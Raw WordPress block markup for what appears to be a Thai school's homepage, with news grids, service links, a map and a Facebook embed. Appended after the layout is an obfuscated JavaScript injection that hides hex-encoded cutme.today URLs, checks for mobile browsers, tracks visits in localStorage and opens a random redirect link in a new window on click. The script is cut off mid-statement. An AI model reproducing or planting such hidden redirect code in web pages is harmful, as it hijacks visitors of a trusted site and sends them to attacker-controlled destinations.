{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 